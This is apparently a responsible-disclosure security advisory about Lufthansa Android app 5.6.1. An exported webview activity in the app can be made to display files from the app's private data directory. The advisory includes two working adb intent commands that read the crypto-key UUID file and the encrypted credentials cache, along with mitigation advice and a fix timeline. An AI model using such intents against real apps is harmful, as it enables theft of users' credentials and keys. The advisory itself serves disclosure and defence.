SIK-2017-004


Title:

Private Files Extraction Possible in Lufthansa App

Report ID

SIK-2017-004

Summary:

  • Vendor: Deutsche Lufthansa AG
  • Product: Lufthansa App
  • Affected Version: 5.6.1
  • Severity: medium
  • Short summary:

Arbitrary private files (shared preferences, crypto secrets, etc.) can be extracted from the Lufthansa app.

Details:

The Lufthansa app implements an activity „LufthansaWebActivity“ that hosts a webview component. This webview can be redirected to arbitrary URIs, including local files, by sending a specially-crafted intent to the activity. An attacker can use this feature to have the webview display otherwise unaccessible files from the app’s private data directory. In combination with SIK-2017-003, this attack can be used to extract the crypto key that the app uses to encrypt the user’s login credentials for the Lufthansa website and app.

Details on intent:

Display the file that contains the UUID from which the crypto key is derived:

am start -n com.lufthansa.android.lufthansa/.ui.activity.web.LufthansaWebActivity -d http://internal-browser/?url=file:///data/data/com.lufthansa.android.lufthansa/files/ad_id_guid -es "EXTRA_URL" "file:///data/data/com.lufthansa.android.lufthansa/files/ad_id_guid"

Display the encrypted credentials:
am start -n com.lufthansa.android.lufthansa/.ui.activity.web.LufthansaWebActivity -d http://internal-browser/?url=file:///data/data/com.lufthansa.android.lufthansa/files/search2.cache -es "EXTRA_URL" "file:///data/data/com.lufthansa.android.lufthansa/files/search2.cache"

The encrypted credentials are harder to extract, because they may contain non-printable characters that the attacker cannot infer from the webview. Still, this is not adequate protection, because it depends on the concrete values.

Workaround

Always logout from the Lufthansa app to remove the credentials from the phone.

Suggested Mitigation

Check whether it is really necessary that this activity is exported. If this is the case, make sure to not allow any local files to be displayed.

Timeline

  • 2017-01-18: Vulnerability Discovered
  • 2017-02-15: Reported
  • 2017-05-17: Vulnerability Fixed